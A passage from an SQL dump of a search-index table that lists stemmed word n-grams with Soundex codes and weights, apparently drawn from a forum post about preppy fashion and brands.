ghetto',0,1,1.4333,'G323',1,'en'),(38156,'ghetto ghetto was','ghetto ghetto was',0,1,1.5667,'G3232',1,'en'),(38157,'ghetto was','ghetto was',0,1,1.3333,'G320',1,'en'),(38158,'ghetto was just','ghetto was just',0,1,1.5,'G323',1,'en'),(38159,'gilmore','gilmor',0,0,0.4667,'G456',1,'en'),(38160,'gilmore can','gilmor can',0,1,1.3667,'G45625',1,'en'),(38161,'gilmore can preppy','gilmor can preppy',0,1,1.6,'G45625161',1,'en'),(38162,'given more','given more',0,1,1.3333,'G156',1,'en'),(38163,'given more weight','given more weight',0,1,1.5667,'G15623',1,'en'),(38164,'glorify','glorifi',0,0,0.4667,'G461',1,'en'),(38165,'glorify elitist','glorifi elitist',0,1,1.5,'G4614323',1,'en'),(38166,'glorify elitist not','glorifi elitist not',0,1,1.6333,'G461432353',1,'en'),(38167,'go into','go into',0,1,1.2333,'G530',1,'en'),(38168,'go into detail','go into detail',0,1,1.4667,'G534',1,'en'),(38169,'go to your','go to your',0,1,1.3333,'G360',1,'en'),(38170,'got straight','got straight',0,1,1.4,'G323623',1,'en'),(38171,'got straight a','got straight a',0,1,1.4667,'G323623',1,'en'),(38172,'gowns and','gown and',0,1,1.3,'G5253',1,'en'),(38173,'gowns and then','gown and then',0,1,1.4667,'G52535',1,'en'),(38174,'hamptons martha','hampton martha',0,1,1.5,'H51352563',1,'en'),(38175,'hamptons martha winery','hampton martha winery',0,1,1.7333,'H5135256356',1,'en'),(38176,'hanes','hane',0,0,0.3333,'H520',1,'en'),(38177,'hanes with','hane with',0,1,1.3333,'H523',1,'en'),(38178,'hanes with prints','hane with prints',0,1,1.5667,'H52316532',1,'en'),(38179,'happy and','happi and',0,1,1.3,'H153',1,'en'),(38180,'happy and not','happi and not',0,1,1.4333,'H15353',1,'en'),(38181,'has and','ha and',0,1,1.2333,'H253',1,'en'),(38182,'has and will','ha and will',0,1,1.4,'H2534',1,'en'),(38183,'has come','ha come',0,1,1.2667,'H250',1,'en'),(38184,'has come to','ha come to',0,1,1.3667,'H253',1,'en'),(38185,'has degraded','ha degraded',0,1,1.4,'H23263',1,'en'),(38186,'has degraded include','ha degraded include',0,1,1.6667,'H232635243',1,'en'),(38187,'have and','have and',0,1,1.2667,'H153',1,'en'),(38188,'have and turned','have and turned',0,1,1.5,'H153653',1,'en'),(38189,'have taken','have taken',0,1,1.3333,'H1325',1,'en'),(38190,'have taken a','have taken a',0,1,1.4,'H1325',1,'en'),(38191,'have you','have you',0,1,1.2667,'H100',1,'en'),(38192,'have you been','have you been',0,1,1.4333,'H150',1,'en'),(38193,'have you teenagers','have you teenagers',0,1,1.6,'H135262',1,'en'),(38194,'highlights','highlight',0,0,0.6667,'H24232',1,'en'),(38195,'highlights deference','highlight deference',0,1,1.6667,'H2423231652',1,'en'),(38196,'highlights deference to','highlight deference to',0,1,1.7667,'H24232316523',1,'en'),(38197,'history','histori',0,0,0.4667,'H236',1,'en'),(38198,'history cleverness','histori cleverness',0,1,1.6,'H236241652',1,'en'),(38199,'history cleverness athleticism','histori cleverness athleticism',0,1,2,'H23624165234325',1,'en'),(38200,'hollister','hollist',0,0,0.6,'H4236',1,'en'),(38201,'hollister and','hollist and',0,1,1.4333,'H423653',1,'en'),(38202,'hollister and coach','hollist and coach',0,1,1.6333,'H4236532',1,'en'),(38203,'hollister it','hollist it',0,1,1.4,'H42363',1,'en'),(38204,'hollister it sad','hollist it sad',0,1,1.5333,'H4236323',1,'en'),(38205,'hollister thing','hollist thing',0,1,1.5,'H4236352',1,'en'),(38206,'hollister thing it','hollist thing it',0,1,1.6,'H42363523',1,'en'),(38207,'hollister view','hollist view',0,1,1.4667,'H42361',1,'en'),(38208,'hollister view word','hollist view word',0,1,1.6333,'H4236163',1,'en'),(38209,'homosexual','homosexu',0,0,0.6667,'H524',1,'en'),(38210,'homosexual like','homosexu like',0,1,1.5,'H5242',1,'en'),(38211,'homosexual like it','homosexu like it',0,1,1.6,'H52423',1,'en'),(38212,'how you','how you',0,1,1.2333,'H000',1,'en'),(38213,'how you think','how you think',0,1,1.4333,'H352',1,'en'),(38214,'however substantial','howev substantial',0,1,1.6333,'H162123534',1,'en'),(38215,'however substantial the','howev substantial the',0,1,1.7667,'H1621235343',1,'en'),(38216,'i calm','i calm',0,1,1.2,'I245',1,'en'),(38217,'i calm well','i calm well',0,1,1.3667,'I2454',1,'en'),(38218,'i don','i don',0,1,1.1667,'I350',1,'en'),(38219,'i don realize','i don realize',0,1,1.4333,'I35642',1,'en'),(38220,'i found my','i found my',0,1,1.3333,'I1535',1,'en'),(38221,'i look','i look',0,1,1.2,'I420',1,'en'),(38222,'i look at','i look at',0,1,1.3,'I423',1,'en'),(38223,'i might','i might',0,1,1.2333,'I523',1,'en'),(38224,'i might only','i might only',0,1,1.4,'I52354',1,'en'),(38225,'i was always','i was always',0,1,1.4,'I242',1,'en'),(38226,'idea','idea',0,0,0.2667,'I300',1,'en'),(38227,'idea ohio','idea ohio',0,1,1.3,'I300',1,'en'),(38228,'idea ohio well','idea ohio well',0,1,1.4667,'I340',1,'en'),(38229,'idealizes','ideal',0,0,0.6,'I342',1,'en'),(38230,'idealizes history','ideal history',0,1,1.5667,'I34236',1,'en'),(38231,'idealizes history cleverness','ideal history cleverness',0,1,1.9333,'I34236241652',1,'en'),(38232,'imply','impli',0,0,0.3333,'I514',1,'en'),(38233,'imply that','impli that',0,1,1.3333,'I5143',1,'en'),(38234,'imply that it','impli that it',0,1,1.4333,'I5143',1,'en'),(38235,'in 2002','in 2002',0,1,1.2333,'I500',1,'en'),(38236,'in 2002 oscar','in 2002 oscar',0,1,1.4333,'I526',1,'en'),(38237,'in abercrombie','in abercrombie',0,1,1.4667,'I5162651',1,'en'),(38238,'in abercrombie hollister','in abercrombie hollister',0,1,1.8,'I51626514236',1,'en'),(38239,'in case','in case',0,1,1.2333,'I520',1,'en'),(38240,'in case you','in case you',0,1,1.3667,'I520',1,'en'),(38241,'in the ranges','in the ranges',0,1,1.4333,'I53652',1,'en'),(38242,'in this room','in this room',0,1,1.4,'I53265',1,'en'),(38243,'in time','in time',0,1,1.2333,'I535',1,'en'),(38244,'in time to','in time to',0,1,1.3333,'I5353',1,'en'),(38245,'in your preppy','in your preppy',0,1,1.4667,'I56161',1,'en'),(38246,'include things','includ things',0,1,1.4667,'I524352',1,'en'),(38247,'include things like','includ things like',0,1,1.6333,'I52435242',1,'en'),(38248,'including because','includ because',0,1,1.5667,'I52435212',1,'en'),(38249,'including because you','includ because you',0,1,1.7,'I52435212',1,'en'),(38250,'industry when','industri when',0,1,1.4333,'I532365',1,'en'),(38251,'industry when truthfully','industri when truthfully',0,1,1.8,'I53236536314',1,'en'),(38252,'institutions','institut',0,0,0.8,'I52352',1,'en'),(38253,'institutions strangely','institut strangely',0,1,1.7333,'I5235236524',1,'en'),(38254,'institutions strangely enough','institut strangely enough',0,1,1.9667,'I523523652452',1,'en'),(38255,'into a','into a',0,1,1.2,'I530',2,'en'),(38256,'into a term','into a term',0,1,1.3667,'I5365',1,'en'),(38257,'into detail','into detail',0,1,1.3667,'I534',1,'en'),(38258,'into detail people','into detail people',0,1,1.6,'I53414',1,'en'),(38259,'into some','into some',0,1,1.3,'I5325',1,'en'),(38260,'into some tragic','into some tragic',0,1,1.5333,'I5325362',1,'en'),(38261,'into to','into to',0,1,1.2333,'I530',1,'en'),(38262,'into to explain','into to explain',0,1,1.5,'I532145',1,'en'),(38263,'is a preppy','is a preppy',0,1,1.3667,'I2161',1,'en'),(38264,'is actually','is actually',0,1,1.3667,'I234',1,'en'),(38265,'is actually ralph','is actually ralph',0,1,1.5667,'I234641',1,'en'),(38266,'is and','is and',0,1,1.2,'I253',1,'en'),(38267,'is and is','is and is',0,1,1.3,'I2532',1,'en'),(38268,'is better','is better',0,1,1.3,'I2136',1,'en'),(38269,'is better scale','is better scale',0,1,1.5,'I213624',1,'en'),(38270,'is loud','is loud',0,1,1.2333,'I243',1,'en'),(38271,'is loud bad','is loud bad',0,1,1.3667,'I24313',1,'en'),(38272,'is marked','is marked',0,1,1.3,'I25623',1,'en'),(38273,'is marked by','is marked by',0,1,1.4,'I256231',1,'en'),(38274,'is not to','is not to',0,1,1.3,'I253',1,'en'),(38275,'is our','is our',0,1,1.2,'I260',1,'en'),(38276,'is our youth','is our youth',0,1,1.4,'I263',1,'en'),(38277,'is sometimes','is sometimes',0,1,1.4,'I25352',1,'en'),(38278,'is sometimes given','is sometimes given',0,1,1.6,'I2535215',1,'en'),(38279,'is that','is that',0,1,1.2333,'I230',2,'en'),(38280,'is that that','is that that',0,1,1.4,'I230',1,'en'),(38281,'is used','is used',0,1,1.2333,'I230',1,'en'),(38282,'is used to','is used to',0,1,1.3333,'I230',1,'en'),(38283,'is why','is why',0,1,1.2,'I200',1,'en'),(38284,'is why attended','is why attended',0,1,1.5,'I2353',1,'en'),(38285,'is worth','is worth',0,1,1.2667,'I263',1,'en'),(38286,'is worth noting','is worth noting',0,1,1.5,'I2635352',1,'en'),(38287,'isn\'t','isn',1,0,0.0417,'I253',4,'en'),(38288,'isn\'t blue','isn blue',0,1,1.3333,'I25314',1,'en'),(38289,'isn\'t blue it','isn blue it',0,1,1.4333,'I253143',1,'en'),(38290,'issue that','issu that',0,1,1.3333,'I230',1,'en'),(38291,'issue that is','issu that is',0,1,1.4333,'I232',1,'en'),(38292,'it as','it as',0,1,1.1667,'I320',1,'en'),(38293,'it as opposed','it as opposed',0,1,1.4333,'I32123',1,'en'),(38294,'it does','it does',0,1,1.2333,'I320',1,'en'),(38295,'it does now','it does now',0,1,1.3667,'I325',1,'en'),(38296,'it excludes','it excludes',0,1,1.3667,'I32432',1,'en'),(38297,'it excludes people','it excludes people',0,1,1.6,'I3243214',1,'en'),(38298,'it filtered','it filtered',0,1,1.3667,'I314363',1,'en'),(38299,'it filtered down','it filtered down',0,1,1.5333,'I3143635',1,'en'),(38300,'it has and','it has and',0,1,1.3333,'I3253',1,'en'),(38301,'it into','it into',0,1,1.2333,'I353',1,'en'),(38302,'it into a','it into a',0,1,1.3,'I353',1,'en'),(38303,'it is a','it is a',0,1,1.2333,'I320',1,'en'),(38304,'it is used','it is used',0,1,1.3333,'I323',1,'en'),(38305,'it is worth','it is worth',0,1,1.3667,'I3263',1,'en'),(38306,'it not','it not',0,1,1.2,'I353',1,'en'),(38307,'it not aqua','it not aqua',0,1,1.3667,'I3532',1,'en'),(38308,'it not fabulous','it not fabulous',0,1,1.5,'I353142',1,'en'),(38309,'it out','it out',0,1,1.2,'I300',3,'en'),(38310,'it out classy','it out classy',0,1,1.4333,'I3242',1,'en'),(38311,'it out of','it out of',0,1,1.3,'I310',2,'en'),(38312,'it sad','it sad',0,1,1.2,'I323',1,'en'),(38313,'it sad that','it sad that',0,1,1.3667,'I323',1,'en'),(38314,'it sort','it sort',0,1,1.2333,'I3263',1,'en'),(38315,'it sort of','it sort of',0,1,1.3333,'I32631',1,'en'),(38316,'it was turn','it was turn',0,1,1.3667,'I32365',1,'en'),(38317,'it was yves','it was yves',0,1,1.3667,'I3212',1,'en'),(38318,'items manner','item manner',0,1,1.4,'I35256',1,'en'),(38319,'items manner in','item manner in',0,1,1.5,'I352565',1,'en'),(38320,'its uses','it uses',0,1,1.2667,'I320',1,'en'),(38321,'its uses to','it uses to',0,1,1.3667,'I323',1,'en'),(38322,'jackets and','jacket and',0,1,1.3667,'J3253',1,'en'),(38323,'jackets and then','jacket and then',0,1,1.5333,'J32535',1,'en'),(38324,'jeans and','jean and',0,1,1.3,'J5253',1,'en'),(38325,'jeans and sandals','jean and sandals',0,1,1.5667,'J525325342',1,'en'),(38326,'job cerulean','job cerulean',0,1,1.4,'J12645',1,'en'),(38327,'job cerulean you','job cerulean you',0,1,1.5333,'J12645',1,'en'),(38328,'jobs and','job and',0,1,1.2667,'J1253',1,'en'),(38329,'jobs and so','job and so',0,1,1.3667,'J12532',1,'en'),(38330,'just a short','just a short',0,1,1.4,'J3263',1,'en'),(38331,'just suppose','just suppose',0,1,1.4,'J3212',1,'en'),(38332,'just suppose to','just suppose to',0,1,1.5,'J32123',1,'en'),(38333,'just what','just what',0,1,1.3,'J300',1,'en'),(38334,'just what runway','just what runway',0,1,1.5333,'J365',1,'en'),(38335,'kennedys','kennedi',0,0,0.5333,'K532',1,'en'),(38336,'kennedys are','kennedi are',0,1,1.4,'K5326',1,'en'),(38337,'kennedys are preppy','kennedi are preppy',0,1,1.6333,'K5326161',1,'en'),(38338,'kept','kept',0,0,0.2667,'K130',2,'en'),(38339,'kept on','kept on',0,1,1.2333,'K135',1,'en'),(38340,'kept on misinterpreting','kept on misinterpreting',0,1,1.7667,'K135253616352',1,'en'),(38341,'kids who','kid who',0,1,1.2667,'K320',1,'en'),(38342,'kids who dress','kid who dress',0,1,1.4667,'K32362',1,'en'),(38343,'know is','know is',0,1,1.2333,'K520',1,'en'),(38344,'know is that','know is that',0,1,1.4,'K523',1,'en'),(38345,'la renta','la renta',0,1,1.2667,'L653',1,'en'),(38346,'la renta did','la renta did',0,1,1.4,'L653',1,'en'),(38347,'lapis','lapi',0,0,0.3333,'L120',1,'en'),(38348,'lapis this','lapi this',0,1,1.3333,'L1232',1,'en'),(38349,'lapis this job','lapi this job',0,1,1.4667,'L12321',1,'en'),(38350,'latter','latter',0,0,0.4,'L360',1,'en'),(38351,'latter universites','latter universites',0,1,1.6,'L36516232',1,'en'),(38352,'latter universites and','latter universites and',0,1,1.7333,'L3651623253',1,'en'),(38353,'lauren bedding','lauren bedding',0,1,1.4667,'L651352',1,'en'),(38354,'lauren bedding items','lauren bedding items',0,1,1.6667,'L651352352',1,'en'),(38355,'lauren is','lauren is',0,1,1.3,'L652',1,'en'),(38356,'lauren is better','lauren is better',0,1,1.5333,'L652136',1,'en'),(38357,'lauren outlet abercromibe','lauren outlet abercromibe',0,1,1.8333,'L65343162651',1,'en'),(38358,'lauren outlet http','lauren outlet http',0,1,1.6,'L653431',1,'en'),(38359,'lauren polo and','lauren polo and',0,1,1.5,'L651453',1,'en'),(38360,'laurent','laurent',0,0,0.4667,'L653',2,'en'),(38361,'laurent wasn','laurent wasn',0,1,1.4,'L65325',1,'en'),(38362,'laurent wasn they','laurent wasn they',0,1,1.5667,'L653253',1,'en'),(38363,'less fortunate','less fortunate',0,1,1.4667,'L216353',1,'en'),(38364,'less fortunate it','less fortunate it',0,1,1.5667,'L216353',1,'en'),(38365,'let me quote','let me quote',0,1,1.4,'L3523',1,'en'),(38366,'like af','like af',0,1,1.2333,'L210',1,'en'),(38367,'like af and','like af and',0,1,1.3667,'L2153',1,'en'),(38368,'like it','like it',0,1,1.2333,'L230',1,'en'),(38369,'like it does','like it does',0,1,1.4,'L232',1,'en'),(38370,'like parts','like parts',0,1,1.3333,'L21632',1,'en'),(38371,'like parts of','like parts of',0,1,1.4333,'L216321',1,'en'),(38372,'like the','like the',0,1,1.2667,'L230',1,'en'),(38373,'like the concept','like the concept',0,1,1.5333,'L2325213',1,'en'),(38374,'likes','like',0,0,0.3333,'L200',1,'en'),(38375,'likes you','like you',0,1,1.3,'L200',1,'en'),(38376,'likes you trend','like you trend',0,1,1.5,'L23653',1,'en'),(38377,'likewise','likewis',0,0,0.5333,'L200',1,'en'),(38378,'likewise as','likewis as',0,1,1.3667,'L200',1,'en'),(38379,'likewise as getting','likewis as getting',0,1,1.6333,'L2352',1,'en'),(38380,'line from','line from',0,1,1.3,'L5165',1,'en'),(38381,'line from film','line from film',0,1,1.4667,'L5165145',1,'en'),(38382,'live then','live then',0,1,1.3,'L135',1,'en'),(38383,'live then it','live then it',0,1,1.4,'L1353',1,'en'),(38384,'long as','long as',0,1,1.2333,'L520',1,'en'),(38385,'long as i','long as i',0,1,1.3,'L520',1,'en'),(38386,'longer glorify','longer glorify',0,1,1.4667,'L5262461',1,'en'),(38387,'longer glorify elitist','longer glorify elitist',0,1,1.7333,'L52624614323',1,'en'),(38388,'look at you','look at you',0,1,1.3667,'L230',1,'en'),(38389,'loud','loud',0,0,0.2667,'L300',1,'en'),(38390,'loud bad','loud bad',0,1,1.2667,'L313',1,'en'),(38391,'loud bad and','loud bad and',0,1,1.4,'L31353',1,'en'),(38392,'lumpy','lumpi',0,0,0.3333,'L510',1,'en'),(38393,'lumpy blue','lumpi blue',0,1,1.3333,'L514',1,'en'),(38394,'lumpy blue dress','lumpi blue dress',0,1,1.5333,'L514362',1,'en'),(38395,'made a','made a',0,1,1.2,'M300',2,'en'),(38396,'made a choice','made a choice',0,1,1.4333,'M320',1,'en'),(38397,'malls','mall',0,0,0.3333,'M420',1,'en'),(38398,'malls and','mall and',0,1,1.3,'M4253',1,'en'),(38399,'malls and then','mall and then',0,1,1.4667,'M42535',1,'en'),(38400,'manner in','manner in',0,1,1.3,'M650',1,'en'),(38401,'manner in case','manner in case',0,1,1.4667,'M652',1,'en'),(38402,'marked','mark',0,0,0.4,'M623',1,'en'),(38403,'marked by','mark by',0,1,1.3,'M6231',1,'en'),(38404,'marked by controversy','mark by controversy',0,1,1.7,'M62312536162',1,'en'),(38405,'martha','martha',0,0,0.4,'M630',1,'en'),(38406,'martha winery','martha winery',0,1,1.4333,'M6356',1,'en'),(38407,'martha winery redesign','martha winery redesign',0,1,1.7333,'M6356325',1,'en'),(38408,'masses','mass',0,0,0.4,'M200',1,'en'),(38409,'masses as','mass as',0,1,1.3,'M200',1,'en'),(38410,'masses as well','mass as well',0,1,1.4667,'M240',1,'en'),(38411,'matter the','matter the',0,1,1.3333,'M363',1,'en'),(38412,'matter the mix','matter the mix',0,1,1.4667,'M36352',1,'en'),(38413,'may for','mai for',0,1,1.2333,'M160',1,'en'),(38414,'may for the','mai for the',0,1,1.3667,'M163',1,'en'),(38415,'me i might','me i might',0,1,1.3333,'M230',1,'en'),(38416,'me quote','me quote',0,1,1.2667,'M230',1,'en'),(38417,'me quote a','me quote a',0,1,1.3333,'M230',1,'en'),(38418,'meanings','mean',0,0,0.5333,'M200',1,'en'),(38419,'meanings changes','mean changes',0,1,1.5333,'M252',1,'en'),(38420,'meanings changes in','mean changes in',0,1,1.6333,'M2525',1,'en'),(38421,'means i','mean i',0,1,1.2333,'M200',1,'en'),(38422,'means i was','mean i was',0,1,1.3667,'M200',1,'en'),(38423,'meant','meant',0,0,0.3333,'M300',1,'en'),(38424,'meant kids','meant kids',0,1,1.3333,'M3232',1,'en'),(38425,'meant kids who','meant kids who',0,1,1.4667,'M3232',1,'en'),(38426,'meant to','meant to',0,1,1.2667,'M300',1,'en'),(38427,'meant to the','meant to the',0,1,1.4,'M300',1,'en'),(38428,'meryl','meryl',0,0,0.3333,'M640',1,'en'),(38429,'meryl streep','meryl streep',0,1,1.4,'M642361',1,'en'),(38430,'meryl streep or','meryl streep or',0,1,1.5,'M6423616',1,'en'),(38431,'might as','might as',0,1,1.2667,'M232',1,'en'),(38432,'might as over','might as over',0,1,1.4333,'M23216',1,'en'),(38433,'might only','might only',0,1,1.3333,'M2354',1,'en'),(38434,'might only buy','might only buy',0,1,1.4667,'M23541',1,'en'),(38435,'might wear','might wear',0,1,1.3333,'M236',1,'en'),(38436,'might wear prada','might wear prada',0,1,1.5333,'M236163',1,'en'),(38437,'misinterpreting','misinterpret',0,0,1,'M253616352',1,'en'),(38438,'misinterpreting the','misinterpret the',0,1,1.6333,'M2536163523',1,'en'),(38439,'misinterpreting the term','misinterpret the term',0,1,1.8,'M253616352365',1,'en'),(38440,'mix','mix',0,0,0.2,'M200',1,'en'),(38441,'mix like','mix like',0,1,1.2667,'M242',1,'en'),(38442,'mix like parts','mix like parts',0,1,1.4667,'M2421632',1,'en'),(38443,'more mostly','more mostly',0,1,1.3667,'M65234',1,'en'),(38444,'more mostly preps','more mostly preps',0,1,1.5667,'M652341612',1,'en'),(38445,'more weight','more weight',0,1,1.3667,'M623',1,'en'),(38446,'more weight than','more weight than',0,1,1.5333,'M6235',1,'en'),(38447,'most teenagers','most teenagers',0,1,1.4667,'M235262',1,'en'),(38448,'most teenagers concept','most teenagers concept',0,1,1.7333,'M2352625213',1,'en'),(38449,'mostly preps','mostli preps',0,1,1.4,'M2341612',1,'en'),(38450,'mostly preps are','mostli preps are',0,1,1.5333,'M23416126',1,'en'),(38451,'my self','my self',0,1,1.2333,'M241',1,'en'),(38452,'my self on','my self on',0,1,1.3333,'M2415',1,'en'),(38453,'necessarily','necessarili',0,0,0.7333,'N264',1,'en'),(38454,'necessarily a','necessarili a',0,1,1.4333,'N264',1,'en'),(38455,'necessarily a trend','necessarili a trend',0,1,1.6333,'N2643653',1,'en'),(38456,'neck','neck',0,0,0.2667,'N200',2,'en'),(38457,'neck and','neck and',0,1,1.2667,'N253',1,'en'),(38458,'neck and diamond','neck and diamond',0,1,1.5333,'N25353',1,'en'),(38459,'new kennedys','new kennedys',0,1,1.4,'N2532',1,'en'),(38460,'new kennedys are','new kennedys are',0,1,1.5333,'N25326',1,'en'),(38461,'nice clothes','nice clothes',0,1,1.4,'N2432',1,'en'),(38462,'nice clothes abercrombie','nice clothes abercrombie',0,1,1.8,'N2432162651',1,'en'),(38463,'no matter the','no matter the',0,1,1.4333,'N363',1,'en'),(38464,'not any','not any',0,1,1.2333,'N350',1,'en'),(38465,'not any longer','not any longer',0,1,1.4667,'N354526',1,'en'),(38466,'not aqua','not aqua',0,1,1.2667,'N320',1,'en'),(38467,'not aqua blue','not aqua blue',0,1,1.4333,'N3214',1,'en'),(38468,'not every','not every',0,1,1.3,'N316',1,'en'),(38469,'not every one','not every one',0,1,1.4333,'N3165',1,'en'),(38470,'not fabulous','not fabulous',0,1,1.4,'N3142',1,'en'),(38471,'not fabulous appears','not fabulous appears',0,1,1.6667,'N3142162',1,'en'),(38472,'not homosexual','not homosexual',0,1,1.4667,'N3524',1,'en'),(38473,'not homosexual like','not homosexual like',0,1,1.6333,'N35242',1,'en'),(38474,'not necessarily','not necessarily',0,1,1.5,'N35264',1,'en'),(38475,'not necessarily a','not necessarily a',0,1,1.5667,'N35264',1,'en'),(38476,'not to do','not to do',0,1,1.3,'N300',1,'en'),(38477,'noting','note',0,0,0.4,'N352',1,'en'),(38478,'noting that','note that',0,1,1.3667,'N3523',1,'en'),(38479,'noting that a','note that a',0,1,1.4333,'N3523',1,'en'),(38480,'now its','now its',0,1,1.2333,'N320',1,'en'),(38481,'now its uses','now its uses',0,1,1.4,'N320',1,'en'),(38482,'now or','now or',0,1,1.2,'N600',1,'en'),(38483,'now or unfavorable','now or unfavorable',0,1,1.6,'N651614',1,'en'),(38484,'nyc now','nyc now',0,1,1.2333,'N250',1,'en'),(38485,'nyc now its','nyc now its',0,1,1.3667,'N2532',1,'en'),(38486,'of 8','of 8',0,1,1.1333,'O100',1,'en'),(38487,'of 8 different','of 8 different',0,1,1.4667,'O131653',1,'en'),(38488,'of a certain','of a certain',0,1,1.4,'O12635',1,'en'),(38489,'of cerulean','of cerulean',0,1,1.3667,'O12645',1,'en'),(38490,'of cerulean gowns','of cerulean gowns',0,1,1.5667,'O12645252',1,'en'),(38491,'of comical','of comical',0,1,1.3333,'O12524',1,'en'),(38492,'of comical how','of comical how',0,1,1.4667,'O12524',1,'en'),(38493,'of nyc','of nyc',0,1,1.2,'O152',1,'en'),(38494,'of nyc now','of nyc now',0,1,1.3333,'O1525',1,'en'),(38495,'of some','of some',0,1,1.2333,'O125',1,'en'),(38496,'of some outdoor','of some outdoor',0,1,1.5,'O12536',1,'en'),(38497,'of stuff','of stuff',0,1,1.2667,'O1231',1,'en'),(38498,'of stuff meryl','of stuff meryl',0,1,1.4667,'O1231564',1,'en'),(38499,'of thebelief','of thebelief',0,1,1.4,'O13141',1,'en'),(38500,'of thebelief that','of thebelief that',0,1,1.5667,'O131413',1,'en'),(38501,'of what','of what',0,1,1.2333,'O130',1,'en'),(38502,'of what preppy','of what preppy',0,1,1.4667,'O13161',1,'en'),(38503,'off they','off they',0,1,1.2667,'O130',1,'en'),(38504,'off they rest','off they rest',0,1,1.4333,'O13623',1,'en'),(38505,'often boarding','often boarding',0,1,1.4667,'O13516352',1,'en'),(38506,'often boarding educational','often boarding educational',0,1,1.8667,'O1351635232354',1,'en'),(38507,'oh i','oh i',0,1,1.1333,'O000',1,'en'),(38508,'oh i don','oh i don',0,1,1.2667,'O350',1,'en'),(38509,'ohio','ohio',0,0,0.2667,'O000',1,'en'),(38510,'ohio well','ohio well',0,1,1.3,'O400',1,'en'),(38511,'ohio well i','ohio well i',0,1,1.3667,'O400',1,'en'),(38512,'on down','on down',0,1,1.2333,'O535',1,'en'),(38513,'on down into','on down into',0,1,1.4,'O5353',1,'en'),(38514,'on exactly','on exactly',0,1,1.3333,'O5234',1,'en'),(38515,'on exactly just','on exactly just',0,1,1.5,'O523423',1,'en'),(38516,'on misinterpreting','on misinterpreting',0,1,1.6,'O5253616352',1,'en'),(38517,'on misinterpreting the','on misinterpreting the',0,1,1.7333,'O52536163523',1,'en'),(38518,'on out','on out',0,1,1.2,'O530',1,'en'),(38519,'on out oh','on out oh',0,1,1.3,'O530',1,'en'),(38520,'on y','on y',0,1,1.1333,'O500',1,'en'),(38521,'on y a','on y a',0,1,1.2,'O500',1,'en'),(38522,'on your','on your',0,1,1.2333,'O560',1,'en'),(38523,'on your back','on your back',0,1,1.4,'O5612',1,'en'),(38524,'one can','on can',0,1,1.2333,'O525',1,'en'),(38525,'one can be','on can be',0,1,1.3333,'O5251',1,'en'),(38526,'only buy','onli buy',0,1,1.2667,'O541',1,'en'),(38527,'only buy ralph','onli buy ralph',0,1,1.4667,'O541641',1,'en'),(38528,'opportunity seekers','opportun seekers',0,1,1.6333,'O16353262',1,'en'),(38529,'opportunity seekers of','opportun seekers of',0,1,1.7333,'O163532621',1,'en'),(38530,'opposed','oppos',0,0,0.4667,'O123',2,'en'),(38531,'opposed to','oppos to',0,1,1.3333,'O123',2,'en'),(38532,'opposed to lapis','oppos to lapis',0,1,1.5333,'O123412',1,'en'),(38533,'or an','or an',0,1,1.1667,'O650',1,'en'),(38534,'or an issue','or an issue',0,1,1.3667,'O652',1,'en'),(38535,'or cost','or cost',0,1,1.2333,'O623',1,'en'),(38536,'or cost doesn\'t','or cost doesn',0,1,1.5,'O623253',1,'en'),(38537,'or perhaps purchasing','or perhaps purchasing',0,1,1.7,'O6161216252',1,'en'),(38538,'or unfavorable','or unfavorable',0,1,1.4667,'O651614',1,'en'),(38539,'or unfavorable ghetto','or unfavorable ghetto',0,1,1.7,'O65161423',1,'en'),(38540,'oscar','oscar',0,0,0.3333,'O260',1,'en'),(38541,'oscar de','oscar de',0,1,1.2667,'O263',1,'en'),(38542,'oscar de la','oscar de la',0,1,1.3667,'O2634',1,'en'),(38543,'other backgrounds','other backgrounds',0,1,1.5667,'O36126532',1,'en'),(38544,'other backgrounds more','other backgrounds more',0,1,1.7333,'O3612653256',1,'en'),(38545,'our youth','our youth',0,1,1.3,'O630',1,'en'),(38546,'our youth arriving','our youth arriving',0,1,1.6,'O636152',1,'en'),(38547,'out classy','out classy',0,1,1.3333,'O3242',1,'en'),(38548,'out classy wealthy','out classy wealthy',0,1,1.6,'O324243',1,'en'),(38549,'out of some','out of some',0,1,1.3667,'O3125',1,'en'),(38550,'out oh','out oh',0,1,1.2,'O300',1,'en'),(38551,'out oh i','out oh i',0,1,1.2667,'O300',1,'en'),(38552,'outdoor patio','outdoor patio',0,1,1.4333,'O3613',1,'en'),(38553,'outdoor patio bin','outdoor patio bin',0,1,1.5667,'O361315',1,'en'),(38554,'outlet abercromibe','outlet abercromibe',0,1,1.6,'O343162651',1,'en'),(38555,'outlet abercromibe what','outlet abercromibe what',0,1,1.7667,'O3431626513',1,'en'),(38556,'outlet http','outlet http',0,1,1.3667,'O3431',1,'en'),(38557,'outlet http www','outlet http www',0,1,1.5,'O3431',1,'en'),(38558,'over priced','over priced',0,1,1.3667,'O161623',1,'en'),(38559,'over priced but','over priced but',0,1,1.5,'O16162313',1,'en'),(38560,'parts','part',0,0,0.3333,'P632',2,'en'),(38561,'parts of','part of',0,1,1.2667,'P6321',1,'en'),(38562,'parts of nyc','part of nyc',0,1,1.4,'P632152',1,'en'),(38563,'patio','patio',0,0,0.3333,'P300',1,'en'),(38564,'patio bin','patio bin',0,1,1.3,'P315',1,'en'),(38565,'patio bin anyhow','patio bin anyhow',0,1,1.5333,'P315',1,'en'),(38566,'pattern vest','pattern vest',0,1,1.4,'P365123',1,'en'),(38567,'pattern vest ralph','pattern vest ralph',0,1,1.6,'P365123641',1,'en'),(38568,'people from','peopl from',0,1,1.3667,'P4165',1,'en'),(38569,'people from established','peopl from established',0,1,1.7667,'P4165231423',1,'en'),(38570,'people from other','peopl from other',0,1,1.5667,'P416536',1,'en'),(38571,'people of','peopl of',0,1,1.3,'P410',1,'en'),(38572,'people of a','peopl of a',0,1,1.3667,'P410',1,'en'),(38573,'people who attended','peopl who attended',0,1,1.6333,'P4353',1,'en'),(38574,'perhaps purchasing','perhap purchasing',0,1,1.6,'P61216252',1,'en'),(38575,'perhaps purchasing fashion','perhap purchasing fashion',0,1,1.8667,'P61216252125',1,'en'),(38576,'person or','person or',0,1,1.3,'P6256',1,'en'),(38577,'person or an','person or an',0,1,1.4,'P62565',1,'en'),(38578,'pile','pile',0,0,0.2667,'P400',1,'en'),(38579,'pile of','pile of',0,1,1.2333,'P410',1,'en'),(38580,'pile of stuff','pile of stuff',0,1,1.4333,'P41231',1,'en'),(38581,'polo and','polo and',0,1,1.2667,'P453',1,'en'),(38582,'polo and a','polo and a',0,1,1.3333,'P453',1,'en'),(38583,'portfolio management solutions','portfolio management solutions',0,1,2,'P6314525324352',1,'en'),(38584,'positive can','posit can',0,1,1.4,'P23125',1,'en'),(38585,'positive can emerge','posit can 